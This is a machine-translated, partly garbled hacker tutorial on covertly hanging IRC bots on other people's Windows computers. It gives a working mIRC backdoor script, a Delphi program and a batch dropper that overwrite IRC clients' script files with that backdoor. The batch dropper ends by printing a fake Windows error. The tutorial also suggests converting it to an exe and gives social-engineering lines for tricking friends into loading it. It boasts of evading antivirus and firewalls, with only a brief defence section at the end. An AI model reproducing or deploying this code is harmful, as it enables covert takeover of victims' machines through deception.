This page has been robot translated, sorry for typos if any. Original content here.

Wir legen den bot auf Windows auf.



1. intro
2. Trojaner
3. mIRC scripts
Ich schreibe dein Skript Hintertür
II. Schreiben Sie auf das Delphi-Programm, das die Hintertür in den Feind mIRC einfügen wird
III. Schreiben Sie auf Batch'ah Prog, die die Hintertür in den Feind mIRC einfügen wird
IV. Soziale Technik: vparivayu prog =)
4. Beide Wege im Vergleich.
5. Wie kann man sich schützen?
6. Outro.

1. In unserer Zeit, unter den Besitzern der populären Kanäle, wurde es modisch, auf den Tunneln von einem Dutzend Bots von verschiedenen Linux-Muscheln zu hängen, um sozusagen "Kanalsicherheit" zu bieten. Ich habe natürlich nichts gegen alle eggdrops dort, aber wie man ein einfacher sterblicher Benutzer ist, der keine Shell, Scc oder Wissen hat (wie die Elite aus Kanal # 31337 auf dem Server irc.dal.net.ru =) Also in diesem Artikel werde ich Ihnen sagen, wie man einen Bot auf einer Maschine mit einem win-like Betriebssystem hängen.
IMHO gibt es nur zwei Möglichkeiten, dies zu tun: Trojaner und Trojaner =) Beginnen wir mit dem ersten.

2. Wenn Sie auf msn (irc.msn.com) waren, bevor Sie es schließen, gelang es mir wahrscheinlich, n-te Anzahl von Bots auf den Kanälen #russian_chat, #russian_girls, #russian_andybig und so weiter zu genießen. So sind diese Bots weit von Eierstöcken. Das ist sozusagen SubSeven'y. Gehört von einem solchen Pferd? Sub7 ist der einzige Trojaner in meinem Gedächtnis, der dir erlaubt, irc-bot fernzuhalten (ich habe lange keine Trojaner benutzt, also weiß ich nicht, ob es irgendwelche Analoga gibt). So schwingen Sie Sub'a von hier und genießen Sie. Diejenigen, die nicht gewohnt sind, nach einfachen Wegen zu suchen, können weiterlesen.

3. Die Fähigkeiten von mirc Scripts sind sehr beeindruckend. Um auf sie zu schreiben, ist der gleiche cgi-scanner eine Kleinigkeit, ganz zu schweigen von einem einfachen bot. Zum Beispiel nehmen Sie das Skript WarSatan. Es ist einfach gebaut und so ein "einfacher bot". Wenn du dich mit deinem Lieblings-irc-Server verbindet, verbindet das Skript gleichzeitig den Gast des Benutzers mit dem irc.webchat.org-Server und windet ihn auf die Kanäle #CHATOP, #MEKAH und #PANGKOR. Das ist der ganze Mechanismus der Arbeit. Unsere Aufgabe ist es, die gleiche einfache Hintertür in Form eines Welt-Plug-Ins zu schreiben.
Ich werde die wichtigsten Zeilen kommentieren.

on 1:CONNECT:{
;#открываем соединение с твоим irc cервером
.sockopen 31337 irc_сервер его_порт
}
on 1:DISCONNECT:{
;#при разрыве соединения убиваем сокет
.sockclose 31337
}
on 1:SOCKOPEN:31337:{
;#авторизуемся на irc-сервере
.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
.sockwrite -n $sockname NICK ник_бота $+ $r(1,999)
;#заходим на твой канал
.sockwrite -n $sockname join твой_канал
}
on 1:SOCKREAD:31337:{
;#этот скрипт автоматически отвечает на серверный ping
;#без него сервер будет кидать бота, потому что тот не отвечает на пинги
.sockread %tmp
if ($gettok(%tmp,1,32) == ping) {
.sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
}
}


Wir entfernen Kommentare, ersetzen unsere Werte, nummerieren die Zeilen (einfach alles in den mIRC-Editor kopieren und alle Nummern speichern) und die resultierende control.dll Datei speichern.
Die Hintertür ist fertig. Jetzt bleibt es, es in jemand anderes script.ini einzufügen.

II. Hier ist die Quelle für das Delphi-Programm, das die Schraube für die Datei script.ini durchsucht und, falls die Suche erfolgreich ist, sie für unsere ersetzt.

Wichtig! Control.dll sollte im selben Verzeichnis mit diesem Programm gehalten werden.

program Project1;

uses
SysUtils,
windows,
shellapi;


const search = 'script.ini'; //файл который нужно найти и заменить
replace = 'control.dll'; //файл, которым надо заменить, должен быть
// в том же месте откуда запуститься эта прога =)


var buf: array [0..255] of char;
fl: PChar;
flag:boolean = false;

//процедура замены файлов
procedure Change(where:pchar);

function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования
var F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
{$I-}
result:=ShFileOperation(F) = 0;
{$I+}
end;

begin
DeleteFile(where);
CopyFile(replace,where)
end;


//процедура глоб. поиска
function Find(DirN: string):boolean;
var
tsr: TSearchRec;
Full: string;

begin
find:=false;
if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
repeat
if (tsr.Name = '.') or (tsr.Name = '..') then continue;
Full:= DirN + '\' + tsr.Name;
if tsr.Attr = faDirectory then //если каталог
Find(Full);
until (FindNext(tsr) <>0)or(tsr.Name = search)or flag;

if tsr.Name = search //если нашли
then begin
find:=true;
flag:=true;
Change(pchar(DirN+'\'+tsr.Name));
end;

end;


//Основной блок программы
begin
if SearchPath(nil,search,nil,sizeof(buf),buf,fl)>0 then
Change(buf)
else
begin
Find('c:');
// если надо и на других дисках искать то можешь сделать так:
// if Not Find('c:') then
// if Not Find('d:') then
// if Not Find('e:') then
//etc....
end;

end.


III. Wenn du nicht mit der Gattung kodierst und cha in die Hefe aus dem Wort "Compiler" wirft, lasst uns ein solches Programm auf Batch'ah schreiben.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

Dieses Kanu von einer Poke-Methode sucht nach mIRC, NeoRa Trion und Looksharp. Die Wahrscheinlichkeit des Auffindens ist eher unbedeutend, so dass es wünschenswert ist, das Subjekt zu überreden, diese Datei zusammen mit control.dll in einem Verzeichnis mit seinem irc-Client zu setzen. Im Falle eines erfolgreichen Suchergebnisses wird die Datei durch eine andere script.ini von unserer control.dll ersetzt.
Umwandeln Sie diese Bat'nik in exe'shnik einige bat2exec'om und Sie können vparivat Ihre Freunde.

IV. Ich denke, es ist nicht für mich, Ihnen zu sagen, wie man "vparivat" jemand exe'shnik. Ich möchte nur ein Feature hervorheben. Stimme zu, bitte fängst deine Exe'shnik evoziert Verdacht auch bei den intimsten Benutzer. So können Sie den anderen Weg gehen. Um dies zu tun, kehren wir zu Schritt I zurück. NICHT INSERT die Zeile des Skripts, leg es einfach in die Datei joke.mrc. Alles Jetzt gebe es deinen Freunden mit den Worten: Lege es in das Verzeichnis mit deiner Welt, gebe in seine Konsole "/ load -rs joke.mrc" und genieße alle Reize des Plugs =)

4. Und was ist der beste Weg, um script.ini zu ersetzen?
1) es ist nicht von antiviren gefangen
2) ist nicht von FairWalls gefangen. Ich denke, dass viele Leute anfangen werden, mit ihrem Schaum aus dem Mund zu beweisen, dass ZoneAlarm und AtGuard sie vor diesem schützen werden. Speziell für sie erkläre ich: Wenn mIRC in diesen beiden Firewalls als zugelassener Server \ Client registriert ist, sieht die FV nicht einmal, wenn die Verbindung von der Hintertür geöffnet wird.
3) es ist schwer zu erkennen / zu töten sogar ein erfahrener Benutzer

5. Und jetzt, wie man sich richtig beschützt Auch hier werde ich die Methode nicht mit Sub7'om betrachten (denn damit ist alles klar: AVP + ZoneAlarm), ich gehe sofort zum zweiten.
Für die Erkennung eines Skripts Backdoor lohnt es sich, einige mIRC Plugin wie IPSearch'a, die auf dem Server des Benutzers mit der gleichen IP wie Sie suchen würde verwenden. Wenn es einen gibt, dann hat jemand definitiv einen bot auf dich gehängt. Wenn dies nicht gefunden wird, dann entweder der Bot auf einem anderen Server, oder du bist sauber.
Auch, um den Bot zu erkennen, kannst du denselben ZAlarm verwenden: Im Moment die größten IRC Server, schau alle Clients auf dem Proxy. Auf welche Weise? Ein einfacher Port-Scan. Also, wenn du eine Verbindung zum Server irc.some.com herstellst und die Ports an der ta scan einige irc.lame.com, dann lohnt es sich zu denken ...
Wie töte ich eine Hintertür? Wenn Sie das Scripting nicht verstehen, installieren Sie einfach den irc Client neu.

6. Was kann ich abschließend sagen? Verwenden Sie keine fremden Skripte und zwingen Sie nicht andere, dies zu tun =)